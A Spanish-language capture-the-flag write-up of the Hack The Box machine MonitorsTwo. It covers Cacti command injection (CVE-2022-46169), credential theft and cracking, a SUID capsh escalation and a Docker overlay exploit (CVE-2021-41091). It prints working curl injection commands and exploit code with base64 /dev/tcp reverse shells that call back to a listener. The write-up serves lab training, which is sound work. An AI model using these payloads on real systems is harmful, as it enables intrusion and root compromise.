MonitorsTwo
13 minutos de lectura
Hack The Box. Linux. Máquina fácil. Esta máquina tiene un servicio Cacti que es vulnerable a ejecución remota de comandos sin autenticación que otorga acceso a un contenedor de Docker. Aquí podemos encontrar credenciales en la base de datos y reutilizarlas para SSH en la máquina host. Luego, descubrimos que la versión de Docker es vulnerable a un CVE. Para explotar esto, necesitamos ser
root en el contenedor y configurar un binario SUID para ejecutarlo desde la máquina host mediante navegación de directorios para escalar privilegios- SO: Linux
- Dificultad: Fácil
- Dirección IP: 10.10.11.211
- Fecha: 29 / 04 / 2023
Escaneo de puertos
# Nmap 7.93 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.11.211 -p 22,80
Nmap scan report for 10.10.11.211
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Login to Cacti
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 9.48 seconds
La máquina tiene abiertos los pueros 22 (SSH) y 80 (HTTP).
Enumeración
Si vamos a http://10.10.11.211, veremos este formulario de inicio de sesión:
Podemos probar credenciales por defecto, pero no funcionan. Lo que es muy interesante es que tenemos el nombre y la versión del servicio (Cacti 1.2.22). Si buscamos exploits, encontraremos uno que coincide con esta versión:
$ searchsploit cacti 1.2.22
------------------------------------------------ ----------------------
Exploit Title | Path
------------------------------------------------ ----------------------
Cacti v1.2.22 - Remote Command Execution (RCE) | php/webapps/51166.py
------------------------------------------------ ----------------------
Shellcodes: No Results
Mirando el exploit de CVE-2022-46169, podemos intuir que explota una vulnerabilidad de inyección de comandos para obtener ejecución remota de comandos (RCE):
def exploit(self):
# cacti local ip from the url for the X-Forwarded-For header
local_cacti_ip = self.url.split("//")[1].split("/")[0]
headers = {
'X-Forwarded-For': f'{local_cacti_ip}'
}
revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"
import base64
b64_revshell = base64.b64encode(revshell.encode()).decode()
payload = f";echo {b64_revshell} | base64 -d | bash -"
payload = urllib.parse.quote(payload)
urls = []
# Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)
for host_id in range(1,100):
for local_data_ids in range(1,100):
urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")
for url in urls:
r = self.session.get(url,headers=headers)
print(f"{r.status_code} - {r.text}" )
pass
Realmente podemos probar esto manualmente con curl en lugar de usar el exploit de otro. El procedimiento intenta encontrar dos números para local_data_ids[] y host_id en un bucle for doble. La cabecera X-Forwarded-For debe ponerse a 127.0.0.1 para saltarse algunas verificaciones (más información aquí y aquí):
$ for i in {1..5}; do for j in {1..5}; do echo -n "$i, $j: "; curl -H 'X-Forwarded-For: 127.0.0.1' "10.10.11.211/remote_agent.php?action=polldata&local_data_ids[]=$i&host_id=$j&poller_id=1"; echo; done; done
1, 1: [{"value":"16","rrd_name":"proc","local_data_id":"1"}]
1, 2: []
1, 3: []
1, 4: []
1, 5: []
2, 1: [{"value":"1min:0.01 5min:0.56 10min:0.45","rrd_name":"","local_data_id":"2"}]
2, 2: []
2, 3: []
2, 4: []
2, 5: []
3, 1: [{"value":"0","rrd_name":"users","local_data_id":"3"}]
3, 2: []
3, 3: []
3, 4: []
3, 5: []
4, 1: [{"value":"2967280","rrd_name":"mem_buffers","local_data_id":"4"}]
4, 2: []
4, 3: []
4, 4: []
4, 5: []
5, 1: [{"value":"1048572","rrd_name":"mem_swap","local_data_id":"5"}]
5, 2: []
5, 3: []
5, 4: []
5, 5: []
Una vez que los hemos encontrado (los que devuelven algunos datos), podemos intentar explotar la vulnerabilidad de inyección de comandos.
Acceso a la máquina
Vamos a codificar un payload de reverse shell en Base64 y a poner nc en escucha:
$ echo -n 'bash -i >& /dev/tcp/10.10.17.44/4444 0>&1' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx
$ nc -nlvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Luego, podemos agregar el payload de inyección de comandos para ejecutar la reverse shell:
$ for i in {1..10}; do curl -H 'X-Forwarded-For: 127.0.0.1' "10.10.11.211/remote_agent.php?action=polldata&local_data_ids[]=$i&host_id=$j&poller_id=1;echo+YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTAzLzQ0NDQgMD4mMSAg+|+base64+-d+|+bash"; echo; done
[{"value":"16","rrd_name":"proc","local_data_id":"1"}]
[{"value":"1min:0.02 5min:0.16 10min:0.29","rrd_name":"","local_data_id":"2"}]
[{"value":"0","rrd_name":"users","local_data_id":"3"}]
[{"value":"2944376","rrd_name":"mem_buffers","local_data_id":"4"}]
[{"value":"1048572","rrd_name":"mem_swap","local_data_id":"5"}]
Como se puede ver, se detiene en la quinta iteración y obtenemos la reverse shell:
$ nc -nlvp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.211.
Ncat: Connection from 10.10.11.211:59542.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@50bca5e748b0:/var/www/html$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@50bca5e748b0:/var/www/html$ ^Z
zsh: suspended ncat -nlvp 4444
$ stty raw -echo; fg
[1] + continued ncat -nlvp 4444
reset xterm
www-data@50bca5e748b0:/var/www/html$ export TERM=xterm
www-data@50bca5e748b0:/var/www/html$ export SHELL=bash
www-data@50bca5e748b0:/var/www/html$ stty rows 50 columns 158
Enumeración del contenedor
Estamos dentro de un contenedor de Docker (observe el nombre del host y el archivo .dockerenv):
www-data@50bca5e748b0:/var/www/html$ hostname
50bca5e748b0
www-data@50bca5e748b0:/var/www/html$ ls -la /
total 108
drwxr-xr-x 1 root root 4096 Mar 21 10:49 .
drwxr-xr-x 1 root root 4096 Mar 21 10:49 ..
-rwxr-xr-x 1 root root 0 Mar 21 10:49 .dockerenv
drwxr-xr-x 1 root root 4096 Mar 22 13:21 bin
drwxr-xr-x 2 root root 4096 Mar 22 13:21 boot
drwxr-xr-x 5 root root 340 May 2 13:53 dev
-rw-r--r-- 1 root root 648 Jan 5 11:37 entrypoint.sh
drwxr-xr-x 1 root root 4096 Mar 21 10:49 etc
drwxr-xr-x 2 root root 4096 Mar 22 13:21 home
drwxr-xr-x 1 root root 4096 Nov 15 04:13 lib
drwxr-xr-x 2 root root 4096 Mar 22 13:21 lib64
drwxr-xr-x 2 root root 4096 Mar 22 13:21 media
drwxr-xr-x 2 root root 4096 Mar 22 13:21 mnt
drwxr-xr-x 2 root root 4096 Mar 22 13:21 opt
dr-xr-xr-x 274 root root 0 May 2 13:53 proc
drwx------ 1 root root 4096 Mar 21 10:50 root
drwxr-xr-x 1 root root 4096 Nov 15 04:17 run
drwxr-xr-x 1 root root 4096 Jan 9 09:30 sbin
drwxr-xr-x 2 root root 4096 Mar 22 13:21 srv
dr-xr-xr-x 13 root root 0 May 2 13:53 sys
drwxrwxrwt 1 root root 24576 May 2 14:59 tmp
drwxr-xr-x 1 root root 4096 Nov 14 00:00 usr
drwxr-xr-x 1 root root 4096 Nov 15 04:13 var
Un servicio interesante para analizar es la base de datos. Podemos buscar archivos de configuración para el servidor web para ver si encontramos credenciales en texto claro:
www-data@50bca5e748b0:/var/www/html$ find . | grep config
./include/config.php
./docs/images/graphs-edit-nontemplate-configuration.png
./docs/apache_template_config.html
www-data@50bca5e748b0:/var/www/html$ cat include/config.php
<?php
/*
* ...
*/
/*
* Make sure these values reflect your actual database/host/user/password
*/
$database_type = 'mysql';
$database_default = 'cacti';
$database_hostname = 'db';
$database_username = 'root';
$database_password = 'root';
$database_port = '3306';
$database_retries = 5;
$database_ssl = false;
$database_ssl_key = '';
$database_ssl_cert = '';
$database_ssl_ca = '';
$database_persist = false;
/*
* ...
*/
Allí las tenemos, ahora podemos conectarnos e intentar encontrar contraseñas para la aplicación web:
www-data@50bca5e748b0:/var/www/html$ mysql --host=db --user=root --password=root --database=cacti
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 325
Server version: 5.7.40 MySQL Community Server (GPL)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [cacti]> show tables;
+-------------------------------------+
| Tables_in_cacti |
+-------------------------------------+
| aggregate_graph_templates |
| aggregate_graph_templates_graph |
| ... |
| snmpagent_notifications_log |
| user_auth |
| user_auth_cache |
| user_auth_group |
| user_auth_group_members |
| user_auth_group_perms |
| user_auth_group_realm |
| user_auth_perms |
| user_auth_realm |
| ... |
| version |
+-------------------------------------+
111 rows in set (0.001 sec)
MySQL [cacti]> describe user_auth;
+------------------------+-----------------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+------------------------+-----------------------+------+-----+---------+----------------+
| id | mediumint(8) unsigned | NO | PRI | NULL | auto_increment |
| username | varchar(50) | NO | MUL | 0 | |
| password | varchar(256) | NO | | | |
| realm | mediumint(8) | NO | MUL | 0 | |
| full_name | varchar(100) | YES | | 0 | |
| ... | ... | ... | ... | ... | ... |
+------------------------+-----------------------+------+-----+---------+----------------+
25 rows in set (0.001 sec)
MySQL [cacti]> select username, password from user_auth;
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC |
| guest | 43e9a4ab75570f5b |
| marcus | $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C |
+----------+--------------------------------------------------------------+
3 rows in set (0.000 sec)
Otra forma de encontrar esto es leyendo /entrypoint.sh, que es un script que se ejecuta cuando el contenedor de Docker está arrancando:
www-data@50bca5e748b0:/var/www/html$ cat /entrypoint.sh
#!/bin/bash
set -ex
wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi
chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
set -- apache2-foreground "$@"
fi
exec "$@"
Ahora tenemos algunos hashes, podemos tratar de romperlos con john y rockyou.txt:
$ john --wordlist=$WORDLISTS/rockyou.txt hashes
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
Press 'q' or Ctrl-C to abort, almost any other key for status
funkymonkey (marcus)
Pruebas
Y con eso tenemos una contraseña en texto claro para el usuario marcus. Como los hashes provienen de bcrypt, el proceso de cracking requiere mucho tiempo. Mientras esperaba, modifiqué las contraseñas de todos los usuarios y accedí a Cacti para ver si había algo interesante:
$ python3 -q
>>> import bcrypt
>>> bcrypt.hashpw(b'asdf', bcrypt.gensalt())
b'$2b$12$vHXG7DCXqUAUGPSEUz1eNuLXAh8Evs0h5XMb6fOZFPz8Vj61S4qru'
MySQL [cacti]> update user_auth set password = '$2b$12$vHXG7DCXqUAUGPSEUz1eNuLXAh8Evs0h5XMb6fOZFPz8Vj61S4qru' where 1;
Query OK, 3 rows affected (0.006 sec)
Rows matched: 3 Changed: 3 Warnings: 0
Pero no…
Enumeración del sistema
Por suerte, john encontró una contaseña de marcus (funkymonkey), que se reutilizaba en SSH:
$ ssh marcus@10.10.11.211
marcus@10.10.11.211's password:
marcus@monitorstwo:~$ cat user.txt
3f29c3098977d9a17a060b91d9004848
Al iniciar sesión, vemos una notificación que muestra You have mail. Efectivamente:
marcus@monitorstwo:~$ cat /var/mail/marcus
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of
Dear all,
We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.
CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.
CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.
CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.
We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.
Best regards,
Administrator
CISO
Monitor Two
Security Team
Se nos da información sobre un CVE útil para explotar esta máquina. El tercero parece prometedor porque tenemos algo de control sobre un contenedor de Docker y la versión está desactualizada:
marcus@monitorstwo:/tmp$ docker version
Client:
Version: 20.10.5+dfsg1
API version: 1.41
Go version: go1.15.9
Git commit: 55c4c88
Built: Wed Aug 4 19:55:57 2021
OS/Arch: linux/amd64
Context: default
Experimental: true
Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/version": dial unix /var/run/docker.sock: connect: permission denied
De hecho, hay una prueba de concepto que se llevó a cabo específicamente en 20.10.5+dfag1, por lo que debemos ir por el camino correcto.
Escalada de privilegios
En primer lugar, necesitamos encontrar una manera de escalar privilegios en el contenedor…
Contenedor
Si listamos binarios SUID, encontramos capsh:
www-data@50bca5e748b0:/var/www/html$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/sbin/capsh
/bin/mount
/bin/umount
/bin/su
Este binario aparece en GFTObins, y parece que podemos obtener una shell como root cuando este binario es SUID. Se puede también usar mi herramienta gtfobins-cli para ver esta información desde la interfaz de línea de comandos:
$ gtfobins-cli --suid capsh
capsh ==> https://gtfobins.github.io/gtfobins/capsh/
SUID
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
sudo install -m =xs $(which capsh) .
./capsh --gid=0 --uid=0 --
Fácil, ¿verdad?
www-data@50bca5e748b0:/var/www/html$ capsh --gid=0 --uid=0 --
root@50bca5e748b0:/var/www/html#
Perfecto. Ahora, mirando la prueba de concepto, vemos que el programa busca un directorio en /var/lib/docker/overlay2 que se mapea al contenedor de Docker. Por lo tanto, si modificamos /bin/bash para que sea un binario SUID, podremos ejecutar este desde la máquina host como si fuera un archivo regular del sistema de archivos del host (una especie de exploit de navegación de directorios). Entonces, vamos a configurar este permiso:
www-data@50bca5e748b0:/var/www/html$ chmod 4755 /bin/bash
root@50bca5e748b0:/var/www/html#
Exploit de Docker
Para encontrar los directorios, el exploit usa findmnt:
marcus@monitorstwo:/tmp$ findmnt
TARGET SOURCE FSTYPE OPTIONS
/ /dev/sda2 ext4 rw,relatime
├─/sys sysfs sysfs rw,nosuid,nodev,noexec,relatime
│ ├─/sys/kernel/security securityfs securityfs rw,nosuid,nodev,noexec,relatime
│ ├─/sys/fs/cgroup tmpfs tmpfs ro,nosuid,nodev,noexec,mode=755
│ │ ├─/sys/fs/cgroup/unified cgroup2 cgroup2 rw,nosuid,nodev,noexec,relatime,nsdelegate
│ │ ├─/sys/fs/cgroup/systemd cgroup cgroup rw,nosuid,nodev,noexec,relatime,xattr,name=systemd
│ │ ├─/sys/fs/cgroup/pids cgroup cgroup rw,nosuid,nodev,noexec,relatime,pids
│ │ ├─/sys/fs/cgroup/cpu,cpuacct cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpu,cpuacct
│ │ ├─/sys/fs/cgroup/freezer cgroup cgroup rw,nosuid,nodev,noexec,relatime,freezer
│ │ ├─/sys/fs/cgroup/net_cls,net_prio cgroup cgroup rw,nosuid,nodev,noexec,relatime,net_cls,net_prio
│ │ ├─/sys/fs/cgroup/cpuset cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpuset
│ │ ├─/sys/fs/cgroup/perf_event cgroup cgroup rw,nosuid,nodev,noexec,relatime,perf_event
│ │ ├─/sys/fs/cgroup/hugetlb cgroup cgroup rw,nosuid,nodev,noexec,relatime,hugetlb
│ │ ├─/sys/fs/cgroup/rdma cgroup cgroup rw,nosuid,nodev,noexec,relatime,rdma
│ │ ├─/sys/fs/cgroup/memory cgroup cgroup rw,nosuid,nodev,noexec,relatime,memory
│ │ ├─/sys/fs/cgroup/devices cgroup cgroup rw,nosuid,nodev,noexec,relatime,devices
│ │ └─/sys/fs/cgroup/blkio cgroup cgroup rw,nosuid,nodev,noexec,relatime,blkio
│ ├─/sys/fs/pstore pstore pstore rw,nosuid,nodev,noexec,relatime
│ ├─/sys/fs/bpf none bpf rw,nosuid,nodev,noexec,relatime,mode=700
│ ├─/sys/kernel/debug debugfs debugfs rw,nosuid,nodev,noexec,relatime
│ ├─/sys/kernel/tracing tracefs tracefs rw,nosuid,nodev,noexec,relatime
│ ├─/sys/kernel/config configfs configfs rw,nosuid,nodev,noexec,relatime
│ └─/sys/fs/fuse/connections fusectl fusectl rw,nosuid,nodev,noexec,relatime
├─/proc proc proc rw,nosuid,nodev,noexec,relatime
│ └─/proc/sys/fs/binfmt_misc systemd-1 autofs rw,relatime,fd=28,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=16682
│ └─/proc/sys/fs/binfmt_misc binfmt_misc binfmt_misc rw,nosuid,nodev,noexec,relatime
├─/dev udev devtmpfs rw,nosuid,noexec,relatime,size=1966932k,nr_inodes=491733,mode=755
│ ├─/dev/pts devpts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000
│ ├─/dev/shm tmpfs tmpfs rw,nosuid,nodev
│ ├─/dev/mqueue mqueue mqueue rw,nosuid,nodev,noexec,relatime
│ └─/dev/hugepages hugetlbfs hugetlbfs rw,relatime,pagesize=2M
├─/run tmpfs tmpfs rw,nosuid,nodev,noexec,relatime,size=402612k,mode=755
│ ├─/run/lock tmpfs tmpfs rw,nosuid,nodev,noexec,relatime,size=5120k
│ ├─/run/docker/netns/f7f9c2eb75fc nsfs[net:[4026532598]]
│ │ nsfs rw
│ ├─/run/user/1000 tmpfs tmpfs rw,nosuid,nodev,relatime,size=402608k,mode=700,uid=1000,gid=1000
│ └─/run/docker/netns/2cc283d5ea48 nsfs[net:[4026532659]]
│ nsfs rw
├─/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
│ overlay overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/756FTPFO4AE7HBWVGI5TXU76FU:/var/lib/docker/overl
├─/var/lib/docker/containers/e2378324fced58e8166b82ec842ae45961417b4195aade5113fdc9c6397edc69/mounts/shm
│ shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k
├─/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
│ overlay overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/4Z77R4WYM6X4BLW7GXAJOAA4SJ:/var/lib/docker/overl
└─/var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/mounts/shm
shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k
marcus@monitorstwo:/tmp$ findmnt | grep -oE '/var/lib/docker/overlay2\/[0-9a-f]+?\/merged'
/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
Hay dos directorios posibles. Veamos si alguno de ellos tienen /bin/bash con permiso SUID:
marcus@monitorstwo:/tmp$ ls -la /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
total 76
drwxr-xr-x 1 root root 4096 Jan 5 11:37 .
drwx-----x 5 root root 4096 May 2 13:53 ..
lrwxrwxrwx 1 root root 7 Dec 6 03:07 bin -> usr/bin
dr-xr-xr-x 2 root root 4096 Mar 22 13:21 boot
drwxr-xr-x 1 root root 4096 Jan 5 11:37 dev
drwxr-xr-x 2 root root 4096 Dec 7 02:24 docker-entrypoint-initdb.d
-rwxr-xr-x 1 root root 0 Jan 5 11:37 .dockerenv
lrwxrwxrwx 1 root root 34 Dec 7 02:24 entrypoint.sh -> usr/local/bin/docker-entrypoint.sh
drwxr-xr-x 1 root root 4096 Jan 5 11:37 etc
drwxr-xr-x 2 root root 4096 Mar 22 13:21 home
lrwxrwxrwx 1 root root 7 Dec 6 03:07 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Dec 6 03:07 lib64 -> usr/lib64
drwxr-xr-x 2 root root 4096 Mar 22 13:21 media
drwxr-xr-x 2 root root 4096 Mar 22 13:21 mnt
drwxr-xr-x 2 root root 4096 Mar 22 13:21 opt
dr-xr-xr-x 2 root root 4096 Mar 22 13:21 proc
dr-xr-x--- 1 root root 4096 Dec 7 02:24 root
drwxr-xr-x 1 root root 4096 Dec 7 02:24 run
lrwxrwxrwx 1 root root 8 Dec 6 03:07 sbin -> usr/sbin
drwxr-xr-x 2 root root 4096 Mar 22 13:21 srv
dr-xr-xr-x 2 root root 4096 Mar 22 13:21 sys
drwxrwxrwt 1 root root 4096 May 2 13:53 tmp
drwxr-xr-x 1 root root 4096 Dec 6 03:07 usr
drwxr-xr-x 1 root root 4096 Dec 6 03:07 var
marcus@monitorstwo:/tmp$ ls -la /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged/bin/bash
-rwxr-xr-x 1 root root 964536 Nov 23 2021 /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged/bin/bash
marcus@monitorstwo:/tmp$ ls -la /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash
-rwsr-xr-x 1 root root 1234376 Mar 27 2022 /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash
Genial, ahí está. Vamos a convertirnos en root:
marcus@monitorstwo:/tmp$ /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p
bash-5.1# cat /root/root.txt
b387bb42bebe034bb10fb213d1c0e967